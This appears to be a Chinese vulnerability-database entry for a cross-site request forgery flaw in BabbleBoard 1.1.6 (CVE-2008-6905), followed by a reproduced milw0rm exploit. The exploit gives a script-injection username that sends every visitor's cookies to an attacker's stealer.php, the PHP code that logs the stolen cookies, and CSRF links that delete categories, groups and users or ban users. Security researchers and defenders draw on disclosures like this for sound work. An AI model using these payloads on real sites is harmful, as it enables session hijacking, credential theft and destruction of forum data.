babbleboard 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117054 漏洞类型 跨站请求伪造
发布时间 2008-12-15 更新时间 2009-08-06
CVE编号 CVE-2008-6905 CNNVD-ID CNNVD-200908-004
漏洞平台 PHP CVSS评分 6.0
|漏洞来源
https://www.exploit-db.com/exploits/7475
https://www.securityfocus.com/bid/84484
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-004
|漏洞详情
BabbleBoard1.1.6版本中的index.php中的跨站请求伪造漏洞,允许远程认证用户借助管理员页,劫持管理员身份认证的请求。该请求可以删除(1)categories或(2)groups;禁止(3)users;删除(4)users。
|漏洞EXP
############################################################################################
[+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF
[+] Discovered By SirGod
[+] Greetz : All my friends
############################################################################################

[+] Cookie Grabber Exploit

  - Steal the cookie of any visitor.

1.Register as :

<script>document.location
="http://[yourdomain]/[path]/stealer.php?cookie=" +
document.cookie;</script>

Everyone who visit the index page will be redirected on your cookie
grabber. (because you will be the Latest Member)

Be sure that you use " and not ' because is forbbiden to use that char
is your username.

2 . In stealer.php use the following code (simple cookie grabber)

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

Make sure that you have in the stealer.php directory a file log.txt .
For stealed cookies check log.txt .

3 . You will grab every visitor cookie .

Example (cookie) of a not logged in user :

PHPSESSID=gtolfce6jppb4oasfm81efrqf6

Example (cookie) of a logged in user (admin) :

bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc;
PHPSESSID=gtolfce6jppb4oasfm81efrqf6

Username is bb_name.Password is bb_password and is hashed as md5.

[+] Cross Site Request Forgery

If a logged in user with administrative permissions click one of the
following links the specified action will be executed.

- Delete category

http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID]

http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5

- Delete group

http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]

http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2

- Ban User

http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID]

http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4

- Delete User

http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID]

http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4

############################################################################################

# milw0rm.com [2008-12-15]
|受影响的产品
BabbleBoard BabbleBoard 1.1.6
|参考资料

来源:XF
名称:babbleboard-index-csrf(47396)
链接:http://xforce.iss.net/xforce/xfdb/47396
来源:MILW0RM
名称:7475
链接:http://www.milw0rm.com/exploits/7475
来源:SECUNIA
名称:33174
链接:http://secunia.com/advisories/33174
来源:OSVDB
名称:50721
链接:http://osvdb.org/50721